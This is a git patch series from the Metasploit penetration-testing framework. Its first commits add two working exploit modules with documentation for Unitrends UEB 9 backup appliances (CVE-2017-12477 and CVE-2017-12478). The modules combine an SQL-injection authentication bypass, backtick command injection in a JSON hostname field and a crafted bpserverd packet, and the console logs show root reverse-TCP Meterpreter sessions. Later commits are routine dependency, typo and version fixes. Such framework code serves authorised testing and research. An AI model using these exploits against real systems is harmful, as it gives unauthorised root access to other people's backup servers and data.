From 36610b185bec5efe73242ed407cc8142b4c7a8bf Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 6 Oct 2017 09:38:33 -0600 Subject: [PATCH 01/22] initial commit for UEB9 exploits - CVE-2017-12477, CVE-2017-12478 --- .../exploit/linux/http/ueb9_api_storage.md | 42 +++++++ .../exploit/linux/misc/ueb9_bpserverd.md | 72 ++++++++++++ .../exploits/linux/http/ueb9_api_storage.rb | 97 ++++++++++++++++ modules/exploits/linux/misc/ueb9_bpserverd.rb | 109 ++++++++++++++++++ 4 files changed, 320 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/ueb9_api_storage.md create mode 100644 documentation/modules/exploit/linux/misc/ueb9_bpserverd.md create mode 100644 modules/exploits/linux/http/ueb9_api_storage.rb create mode 100644 modules/exploits/linux/misc/ueb9_bpserverd.rb diff --git a/documentation/modules/exploit/linux/http/ueb9_api_storage.md b/documentation/modules/exploit/linux/http/ueb9_api_storage.md new file mode 100644 index 0000000000..05abde08c9 --- /dev/null +++ b/documentation/modules/exploit/linux/http/ueb9_api_storage.md @@ -0,0 +1,42 @@ +## Vulnerable Application + + Unitrends UEB 9 http api/storage remote root + + This exploit leverages a sqli vulnerability for authentication bypass, + together with command injection for subsequent root RCE. + +## Verification Steps + + 1. ```use exploit/linux/http/ueb9_api_storage ``` + 2. ```set lhost [IP]``` + 3. ```set rhost [IP]``` + 4. ```exploit``` + 5. A meterpreter session should have been opened successfully + +## Scenarios + +### UEB 9.1 on CentOS 6.5 + +``` +msf > use exploit/linux/http/ueb9_api_storage +msf exploit(ueb9_api_storage) > set rhost 10.0.0.230 +rhost => 10.0.0.230 +msf exploit(ueb9_api_storage) > set lhost 10.0.0.141 +lhost => 10.0.0.141 +msf exploit(ueb9_api_storage) > exploit + +[*] Started reverse TCP handler on 10.0.0.141:4444 +[*] 10.0.0.230:443 - pwn'ng ueb 9.... +[*] Command Stager progress - 19.83% done (164/827 bytes) +[*] Command Stager progress - 39.30% done (325/827 bytes) +[*] Command Stager progress - 57.44% done (475/827 bytes) +[*] Command Stager progress - 75.45% done (624/827 bytes) +[*] Command Stager progress - 93.35% done (772/827 bytes) +[*] Command Stager progress - 110.88% done (917/827 bytes) +[*] Sending stage (826872 bytes) to 10.0.0.230 +[*] Command Stager progress - 126.72% done (1048/827 bytes) +[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400 + +meterpreter > getuid +Server username: uid=0, gid=0, euid=0, egid=0 +``` \ No newline at end of file diff --git a/documentation/modules/exploit/linux/misc/ueb9_bpserverd.md b/documentation/modules/exploit/linux/misc/ueb9_bpserverd.md new file mode 100644 index 0000000000..8421e38570 --- /dev/null +++ b/documentation/modules/exploit/linux/misc/ueb9_bpserverd.md @@ -0,0 +1,72 @@ +## Vulnerable Application + + Unitrends UEB 9 bpserverd authentication bypass RCE + + This exploit uses roughly the same process to gain root execution + as does the apache user on the Unitrends appliance. The process is + something like this: + + 1. Connect to xinetd process (it's usually running on port 1743) + 2. This process will send something like: '?A,Connect36092' + 3. Initiate a second connection to the port specified + in the packet from xinetd (36092 in this example) + 4. send a specially crafted packet to xinetd, containing the + command to be executed as root + 5. Receive command output from the connection to port 36092 + 6. Close both connections + + +## Verification Steps + + 1. ```use exploit/linux/misc/ueb9_bpserverd ``` + 2. ```set lhost [IP]``` + 3. ```set rhost [IP]``` + 4. ```exploit``` + 5. A meterpreter session should have been opened successfully + +## Scenarios + +### UEB 9.1 on CentOS 6.5 + +``` +msf > use exploit/linux/misc/ueb9_bpserverd +msf exploit(ueb9_bpserverd) > set rhost 10.0.0.230 +rhost => 10.0.0.230 +msf exploit(ueb9_bpserverd) > set lhost 10.0.0.141 +lhost => 10.0.0.141 +msf exploit(ueb9_bpserverd) > exploit + +[*] Started reverse TCP handler on 10.0.0.141:4444 +[*] 10.0.0.230:1743 - 10.0.0.230:1743 - pwn'ng ueb 9.... +[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port... +[+] 10.0.0.230:1743 - bpd port recieved: 45425 +[*] 10.0.0.230:1743 - Connecting to 45425 +[+] 10.0.0.230:1743 - Connected! +[*] 10.0.0.230:1743 - Sending command buffer to xinetd +[*] 10.0.0.230:1743 - Command Stager progress - 26.71% done (199/745 bytes) +[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port... +[+] 10.0.0.230:1743 - bpd port recieved: 40889 +[*] 10.0.0.230:1743 - Connecting to 40889 +[+] 10.0.0.230:1743 - Connected! +[*] 10.0.0.230:1743 - Sending command buffer to xinetd +[*] 10.0.0.230:1743 - Command Stager progress - 53.56% done (399/745 bytes) +[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port... +[+] 10.0.0.230:1743 - bpd port recieved: 40016 +[*] 10.0.0.230:1743 - Connecting to 40016 +[+] 10.0.0.230:1743 - Connected! +[*] 10.0.0.230:1743 - Sending command buffer to xinetd +[*] 10.0.0.230:1743 - Command Stager progress - 80.27% done (598/745 bytes) +[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port... +[+] 10.0.0.230:1743 - bpd port recieved: 53649 +[*] 10.0.0.230:1743 - Connecting to 53649 +[+] 10.0.0.230:1743 - Connected! +[*] 10.0.0.230:1743 - Sending command buffer to xinetd +[*] Sending stage (826872 bytes) to 10.0.0.230 +[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33715) at 2017-10-06 11:33:56 -0400 +[*] 10.0.0.230:1743 - Command Stager progress - 100.00% done (745/745 bytes) + +meterpreter > getuid +Server username: uid=0, gid=0, euid=0, egid=0 +meterpreter > + +``` \ No newline at end of file diff --git a/modules/exploits/linux/http/ueb9_api_storage.rb b/modules/exploits/linux/http/ueb9_api_storage.rb new file mode 100644 index 0000000000..e344ce3bf3 --- /dev/null +++ b/modules/exploits/linux/http/ueb9_api_storage.rb @@ -0,0 +1,97 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'openssl' +require 'base64' +require 'uri' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Unitrends UEB 9 http api/storage remote root', + 'Description' => %q{ + It was discovered that the api/storage web interface in Unitrends Backup (UB) + before 10.0.0 has an issue in which one of its input parameters was not validated. + A remote attacker could use this flaw to bypass authentication and execute arbitrary + commands with root privilege on the target system. + }, + 'Author' => + [ + 'Cale Smith' # @0xC413 + 'Benny Husted', # @BennyHusted + 'Jared Arave' # @iotennui + ], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86], + 'CmdStagerFlavor' => [ 'printf' ], + 'References' => + [ + ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'], + ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'], + ['CVE', 'CVE-2017-12478'], + ], + 'Targets' => + [ + [ 'UEB 9.*', { } ] + ], + 'Privileged' => true, + 'DefaultOptions' => + { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', + 'SSL' => true + }, + 'DisclosureDate' => 'Aug 8th 2017', + 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]) + ]) + deregister_options('SRVHOST', 'SRVPORT') + end + + #substitue some charactes + def filter_bad_chars(cmd) + cmd.gsub!("\\", "\\\\\\") + cmd.gsub!("'", '\\"') + end + + def execute_command(cmd, opts = {}) + + session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass + session = Base64.strict_encode64(session) #b64 encode session token + + #substitue the cmd into the hostname parameter + parms = "{\"type\":4,\"name\":\"_Stateless\",\"usage\":\"stateless\",\"build_filesystem\":1,\"properties\":{\"username\":\"aaaa\",\"password\":\"aaaa\",\"hostname\":\"`#{filter_bad_chars(cmd)}` &\",\"port\":\"2049\",\"protocol\":\"nfs\",\"share_name\":\"aaa\"}}" + + + res = send_request_cgi({ + 'uri' => '/api/storage', + 'method' => 'POST', + 'ctype' => 'application/json', + 'encode_params' => false, + 'data' => parms, + 'headers' => + {'AuthToken' => session,} + }) + + if res.code != 500 + print_error("Unexpected response") + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") + end + + def exploit + print_status("#{peer} - pwn'ng ueb 9....") + execute_cmdstager(:linemax => 120) + + end +end \ No newline at end of file diff --git a/modules/exploits/linux/misc/ueb9_bpserverd.rb b/modules/exploits/linux/misc/ueb9_bpserverd.rb new file mode 100644 index 0000000000..4a800e194b --- /dev/null +++ b/modules/exploits/linux/misc/ueb9_bpserverd.rb @@ -0,0 +1,109 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Unitrends UEB bpserverd authentication bypass RCE', + 'Description' => %q{ + It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd, + has an issue in which its authentication can be bypassed. A remote attacker could use this + issue to execute arbitrary commands with root privilege on the target system.™ + }, + 'Author' => + [ + 'Jared Arave', # @iotennui + 'Cale Smith', # @0xC413 + 'Benny Husted' # @BennyHusted + ], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86], + 'CmdStagerFlavor' => [ 'printf' ], + 'References' => + [ + ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755'], + ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12477'], + ['CVE', 'CVE-2017-12477'], + ], + 'Targets' => + [ + [ 'UEB 9.*', { } ] + ], + 'Privileged' => true, + 'DefaultOptions' => + { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', + 'SSL' => false + }, + 'DisclosureDate' => 'Aug 8th 2017', + 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(1743), + ]) + deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') + end + + def filter_bad_chars(cmd) + end + + def execute_command(cmd, opts = {}) + + #append a comment, ignore everything after our cmd + cmd = cmd + " #" + + # build the attack buffer... + command_len = cmd.length + 3 + packet_len = cmd.length + 23 + data = "\xa5\x52\x00\x2d" + data << "\x00\x00\x00" + data << packet_len + data << "\x00\x00\x00" + data << "\x01" + data << "\x00\x00\x00" + data << "\x4c" + data << "\x00\x00\x00" + data << command_len + data << cmd + data << "\x00\x00\x00" + + begin + print_status("Connecting to xinetd for bpd port...") + s1 = connect(global = false) + buf1 = s1.get_once(-1).to_s + + #parse out the bpd port returned, we will connect back on this port to send our cmd + bpd_port = buf1[-8..-3].to_i + + print_good("bpd port recieved: #{bpd_port.to_s}") + print_status("Connecting to #{bpd_port.to_s}") + + s2 = connect(global = false, opts = {'RPORT'=>bpd_port}) + print_good("Connected!") + + print_status("Sending command buffer to xinetd") + + s1.put(data) + s2.get_once(-1,1).to_s + + disconnect(s1) + disconnect(s2) + + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + end + + end + + def exploit + print_status("#{peer} - pwn'ng ueb 9....") + execute_cmdstager(:linemax => 200, :nodelete => true) + end +end From 78e262eabd794c5ed4827c6e3710e94978b3c186 Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 6 Oct 2017 10:15:30 -0600 Subject: [PATCH 02/22] fixed issues identified by msftidy --- modules/exploits/linux/http/ueb9_api_storage.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/ueb9_api_storage.rb b/modules/exploits/linux/http/ueb9_api_storage.rb index e344ce3bf3..2c2bb933a6 100644 --- a/modules/exploits/linux/http/ueb9_api_storage.rb +++ b/modules/exploits/linux/http/ueb9_api_storage.rb @@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote [ ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'], - ['CVE', 'CVE-2017-12478'], + ['CVE', '2017-12478'], ], 'Targets' => [ @@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', 'SSL' => true }, - 'DisclosureDate' => 'Aug 8th 2017', + 'DisclosureDate' => 'Aug 8 2017', 'DefaultTarget' => 0)) register_options( [ @@ -94,4 +94,4 @@ class MetasploitModule < Msf::Exploit::Remote execute_cmdstager(:linemax => 120) end -end \ No newline at end of file +end From 63e38923928eeb814f5459200e50ac8dfa305dec Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 6 Oct 2017 10:16:01 -0600 Subject: [PATCH 03/22] fixed issues identified by msftidy --- modules/exploits/linux/misc/ueb9_bpserverd.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/misc/ueb9_bpserverd.rb b/modules/exploits/linux/misc/ueb9_bpserverd.rb index 4a800e194b..cc265a3710 100644 --- a/modules/exploits/linux/misc/ueb9_bpserverd.rb +++ b/modules/exploits/linux/misc/ueb9_bpserverd.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd, has an issue in which its authentication can be bypassed. A remote attacker could use this - issue to execute arbitrary commands with root privilege on the target system.™ + issue to execute arbitrary commands with root privilege on the target system. }, 'Author' => [ @@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote [ ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12477'], - ['CVE', 'CVE-2017-12477'], + ['CVE', '2017-12477'], ], 'Targets' => [ @@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', 'SSL' => false }, - 'DisclosureDate' => 'Aug 8th 2017', + 'DisclosureDate' => 'Aug 8 2017', 'DefaultTarget' => 0)) register_options( [ From 752d21e11c595001c460db03ab00d4c3784e51eb Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 6 Oct 2017 10:47:42 -0600 Subject: [PATCH 04/22] forgot a comma --- modules/exploits/linux/http/ueb9_api_storage.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ueb9_api_storage.rb b/modules/exploits/linux/http/ueb9_api_storage.rb index 2c2bb933a6..65267a3ee5 100644 --- a/modules/exploits/linux/http/ueb9_api_storage.rb +++ b/modules/exploits/linux/http/ueb9_api_storage.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Author' => [ - 'Cale Smith' # @0xC413 + 'Cale Smith', # @0xC413 'Benny Husted', # @BennyHusted 'Jared Arave' # @iotennui ], From c478133539861ab41759ce3dc75b017513eefb26 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Tue, 10 Oct 2017 23:19:44 -0500 Subject: [PATCH 05/22] add aggregator >= 1.0.0 with cryptTLV support --- Gemfile | 3 +-- Gemfile.lock | 32 ++++++++++++++++++++++++++++++++ 2 files changed, 33 insertions(+), 2 deletions(-) diff --git a/Gemfile b/Gemfile index 3910ee17ff..12b6341b41 100755 --- a/Gemfile +++ b/Gemfile @@ -19,8 +19,7 @@ group :development do # module documentation gem 'octokit' # Metasploit::Aggregator external session proxy - # Disabled for now for crypttlv updates - # gem 'metasploit-aggregator' + gem 'metasploit-aggregator' end group :development, :test do diff --git a/Gemfile.lock b/Gemfile.lock index 2243aadc1a..27b0044898 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -126,15 +126,39 @@ GEM ffi (1.9.18) filesize (0.1.1) fivemat (1.3.5) + google-protobuf (3.4.1.1) + googleapis-common-protos-types (1.0.0) + google-protobuf (~> 3.0) + googleauth (0.5.3) + faraday (~> 0.12) + jwt (~> 1.4) + logging (~> 2.0) + memoist (~> 0.12) + multi_json (~> 1.11) + os (~> 0.9) + signet (~> 0.7) + grpc (1.6.6) + google-protobuf (~> 3.1) + googleapis-common-protos-types (~> 1.0.0) + googleauth (~> 0.5.1) hashery (2.1.2) i18n (0.8.6) jsobfu (0.4.2) rkelly-remix json (2.1.0) + jwt (1.5.6) + little-plugger (1.1.4) + logging (2.2.2) + little-plugger (~> 1.1) + multi_json (~> 1.10) loofah (2.1.1) crass (~> 1.0.2) nokogiri (>= 1.5.9) + memoist (0.16.0) metasm (1.0.3) + metasploit-aggregator (1.0.0) + grpc + rex-arch metasploit-concern (2.0.5) activemodel (~> 4.2.6) activesupport (~> 4.2.6) @@ -168,6 +192,7 @@ GEM mini_portile2 (2.3.0) minitest (5.10.3) msgpack (1.1.0) + multi_json (1.12.2) multipart-post (2.0.0) nessus_rest (0.1.6) net-ssh (4.2.0) @@ -179,6 +204,7 @@ GEM sawyer (~> 0.8.0, >= 0.5.3) openssl-ccm (1.2.1) openvas-omp (0.0.4) + os (0.9.6) packetfu (1.1.13) pcaprub patch_finder (1.0.2) @@ -304,6 +330,11 @@ GEM sawyer (0.8.1) addressable (>= 2.3.5, < 2.6) faraday (~> 0.8, < 1.0) + signet (0.7.3) + addressable (~> 2.3) + faraday (~> 0.9) + jwt (~> 1.5) + multi_json (~> 1.10) simplecov (0.15.1) docile (~> 1.1.0) json (>= 1.8, < 3) @@ -332,6 +363,7 @@ PLATFORMS DEPENDENCIES factory_girl_rails fivemat + metasploit-aggregator (~> 1.0.0) metasploit-framework! octokit pry From 5458b58a74a035e141a939dff0a85eff1330bdae Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 18 Oct 2017 13:21:02 -0500 Subject: [PATCH 06/22] restrict aggregator on arm for now --- Gemfile | 5 ++++- Gemfile.lock | 2 +- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/Gemfile b/Gemfile index 12b6341b41..012578df9f 100755 --- a/Gemfile +++ b/Gemfile @@ -19,7 +19,10 @@ group :development do # module documentation gem 'octokit' # Metasploit::Aggregator external session proxy - gem 'metasploit-aggregator' + gem 'metasploit-aggregator' if [ + 'x86-mingw32', 'x64-mingw32', + 'x86_64-linux', 'x86-linux', + 'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin')) end group :development, :test do diff --git a/Gemfile.lock b/Gemfile.lock index 27b0044898..47d0e89ca5 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -363,7 +363,7 @@ PLATFORMS DEPENDENCIES factory_girl_rails fivemat - metasploit-aggregator (~> 1.0.0) + metasploit-aggregator metasploit-framework! octokit pry From 7cd532c384271c63dc3dd21506890fb55a856760 Mon Sep 17 00:00:00 2001 From: Kent Gruber Date: Thu, 19 Oct 2017 19:55:58 -0400 Subject: [PATCH 07/22] Change targetr to target to fix small typo bug on one failure MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The target object seems to have a typo where it is referred to as “targetr” which I’d guess isn’t exactly what we’d like to do in this case. So, I’ve changed that to “target” in order to work. So, I’ve simply fixed that small typo. --- .../windows/browser/ms07_017_ani_loadimage_chunksize.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb index 2ff4a00222..522abb2448 100644 --- a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb @@ -494,7 +494,7 @@ class MetasploitModule < Msf::Exploit::Remote ].pack('v') else - fail_with(Failure::NoTarget, "Unknown target #{targetr['Method']}") + fail_with(Failure::NoTarget, "Unknown target #{target['Method']}") end # Build the ANI file From a3912e49131b4628faab5424b17235754ac28817 Mon Sep 17 00:00:00 2001 From: RageLtMan Date: Wed, 18 Oct 2017 14:37:22 -0400 Subject: [PATCH 08/22] Provide disconnect option to send_request_cgi The HTTP client mixin provides a #send_request_cgi method which forcibly disconnects the client after receiving a response. This terminates certain types of resulting sessions which depend on the connection from the client to maintain a subprocess housing the shell invocation. Provide a disconnect boolean option to #send_request_cgi which is checked in the disconnect(c) call after receiving the response. Testing: Locally tested on in-house exploit module written for disclosure report. TODO: Discuss possibility of implementing fully asynchronous methods like #send_request_cgi_async which won't bother getting a response for cases such as the module mentioned above which is a command injection via unfiltered POST var. --- lib/msf/core/exploit/http/client.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index d7bcc0c46e..daa6ac6f83 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -334,7 +334,7 @@ module Exploit::Remote::HttpClient # Passes `opts` through directly to {Rex::Proto::Http::Client#request_cgi}. # # @return (see Rex::Proto::Http::Client#send_recv)) - def send_request_cgi(opts={}, timeout = 20) + def send_request_cgi(opts={}, timeout = 20, disconnect = true) if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0 actual_timeout = datastore['HttpClientTimeout'] else @@ -362,7 +362,7 @@ module Exploit::Remote::HttpClient print_line('#' * 20) print_line(res.to_terminal_output) end - disconnect(c) + disconnect(c) if disconnect res rescue ::Errno::EPIPE, ::Timeout::Error => e print_line(e.message) if datastore['HttpTrace'] From 8e5deac3f48ee8f4343a487ea46ae9c7ed001ca5 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 20 Oct 2017 00:38:01 -0500 Subject: [PATCH 09/22] Fix nil bug in setting PromptChar without Prompt --- lib/msf/ui/console/driver.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index f43d99e36c..1e303bf4ee 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -593,7 +593,7 @@ class Driver < Msf::Ui::Driver when "prompt" update_prompt(val, framework.datastore['PromptChar'] || DefaultPromptChar, true) when "promptchar" - update_prompt(framework.datastore['Prompt'], val, true) + update_prompt(framework.datastore['Prompt'] || DefaultPrompt, val, true) end end From 884b68fa601d0c3cc1710e89b0dc8638c33aa5ad Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 20 Oct 2017 10:02:23 -0700 Subject: [PATCH 10/22] Bump version of framework to 4.16.13 --- Gemfile.lock | 48 +++++++++++++++-------------- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 26 insertions(+), 24 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 787243fc70..1ac48727a1 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.12) + metasploit-framework (4.16.13) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -104,13 +104,14 @@ GEM arel (6.0.4) arel-helpers (2.5.0) activerecord (>= 3.1.0, < 6) - backports (3.10.0) + backports (3.10.3) bcrypt (3.1.11) bcrypt_pbkdf (1.0.0) bindata (2.4.1) bit-struct (0.16) builder (3.2.3) coderay (1.1.2) + concurrent-ruby (1.0.5) crass (1.0.2) diff-lcs (1.3) dnsruby (1.60.2) @@ -137,12 +138,13 @@ GEM multi_json (~> 1.11) os (~> 0.9) signet (~> 0.7) - grpc (1.6.6) + grpc (1.6.7) google-protobuf (~> 3.1) googleapis-common-protos-types (~> 1.0.0) googleauth (~> 0.5.1) hashery (2.1.2) - i18n (0.8.6) + i18n (0.9.0) + concurrent-ruby (~> 1.0) jsobfu (0.4.2) rkelly-remix json (2.1.0) @@ -221,7 +223,7 @@ GEM activerecord (>= 4.0.0) arel (>= 4.0.1) pg_array_parser (~> 0.0.9) - pry (0.11.1) + pry (0.11.2) coderay (~> 1.1.0) method_source (~> 0.9.0) public_suffix (3.0.0) @@ -297,29 +299,29 @@ GEM rex-zip (0.1.3) rex-text rkelly-remix (0.0.7) - rspec (3.6.0) - rspec-core (~> 3.6.0) - rspec-expectations (~> 3.6.0) - rspec-mocks (~> 3.6.0) - rspec-core (3.6.0) - rspec-support (~> 3.6.0) - rspec-expectations (3.6.0) + rspec (3.7.0) + rspec-core (~> 3.7.0) + rspec-expectations (~> 3.7.0) + rspec-mocks (~> 3.7.0) + rspec-core (3.7.0) + rspec-support (~> 3.7.0) + rspec-expectations (3.7.0) diff-lcs (>= 1.2.0, < 2.0) - rspec-support (~> 3.6.0) - rspec-mocks (3.6.0) + rspec-support (~> 3.7.0) + rspec-mocks (3.7.0) diff-lcs (>= 1.2.0, < 2.0) - rspec-support (~> 3.6.0) - rspec-rails (3.6.1) + rspec-support (~> 3.7.0) + rspec-rails (3.7.1) actionpack (>= 3.0) activesupport (>= 3.0) railties (>= 3.0) - rspec-core (~> 3.6.0) - rspec-expectations (~> 3.6.0) - rspec-mocks (~> 3.6.0) - rspec-support (~> 3.6.0) + rspec-core (~> 3.7.0) + rspec-expectations (~> 3.7.0) + rspec-mocks (~> 3.7.0) + rspec-support (~> 3.7.0) rspec-rerun (1.1.0) rspec (~> 3.0) - rspec-support (3.6.0) + rspec-support (3.7.0) ruby-rc4 (0.1.5) ruby_smb (0.0.18) bindata @@ -330,10 +332,10 @@ GEM sawyer (0.8.1) addressable (>= 2.3.5, < 2.6) faraday (~> 0.8, < 1.0) - signet (0.7.3) + signet (0.8.1) addressable (~> 2.3) faraday (~> 0.9) - jwt (~> 1.5) + jwt (>= 1.5, < 3.0) multi_json (~> 1.10) simplecov (0.15.1) docile (~> 1.1.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index f79f808ff4..c111856d17 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.12" + VERSION = "4.16.13" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From e8de6a46d5efabc0f66ca047e134613caf01b6be Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 20 Oct 2017 12:21:17 -0600 Subject: [PATCH 11/22] Update ueb9_bpserverd.md --- documentation/modules/exploit/linux/misc/ueb9_bpserverd.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/linux/misc/ueb9_bpserverd.md b/documentation/modules/exploit/linux/misc/ueb9_bpserverd.md index 8421e38570..570b426afe 100644 --- a/documentation/modules/exploit/linux/misc/ueb9_bpserverd.md +++ b/documentation/modules/exploit/linux/misc/ueb9_bpserverd.md @@ -7,7 +7,7 @@ something like this: 1. Connect to xinetd process (it's usually running on port 1743) - 2. This process will send something like: '?A,Connect36092' + 2. This process will send something like: `?A,Connect36092` 3. Initiate a second connection to the port specified in the packet from xinetd (36092 in this example) 4. send a specially crafted packet to xinetd, containing the @@ -69,4 +69,4 @@ meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0 meterpreter > -``` \ No newline at end of file +``` From 8febde8291971ef902d870cec51fc60be50b36af Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 20 Oct 2017 12:23:53 -0600 Subject: [PATCH 12/22] Update ueb9_api_storage.rb --- modules/exploits/linux/http/ueb9_api_storage.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/ueb9_api_storage.rb b/modules/exploits/linux/http/ueb9_api_storage.rb index 65267a3ee5..72ac83214c 100644 --- a/modules/exploits/linux/http/ueb9_api_storage.rb +++ b/modules/exploits/linux/http/ueb9_api_storage.rb @@ -3,9 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'openssl' -require 'base64' -require 'uri' + class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking From abc749e1e8f0fd94051b7befb3111bd07aa783c7 Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 20 Oct 2017 13:48:29 -0600 Subject: [PATCH 13/22] Update ueb9_api_storage.rb --- modules/exploits/linux/http/ueb9_api_storage.rb | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/modules/exploits/linux/http/ueb9_api_storage.rb b/modules/exploits/linux/http/ueb9_api_storage.rb index 72ac83214c..bbcb7120c0 100644 --- a/modules/exploits/linux/http/ueb9_api_storage.rb +++ b/modules/exploits/linux/http/ueb9_api_storage.rb @@ -67,7 +67,9 @@ class MetasploitModule < Msf::Exploit::Remote session = Base64.strict_encode64(session) #b64 encode session token #substitue the cmd into the hostname parameter - parms = "{\"type\":4,\"name\":\"_Stateless\",\"usage\":\"stateless\",\"build_filesystem\":1,\"properties\":{\"username\":\"aaaa\",\"password\":\"aaaa\",\"hostname\":\"`#{filter_bad_chars(cmd)}` &\",\"port\":\"2049\",\"protocol\":\"nfs\",\"share_name\":\"aaa\"}}" + parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`| + parms << filter_bad_chars(cmd) + parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}| res = send_request_cgi({ 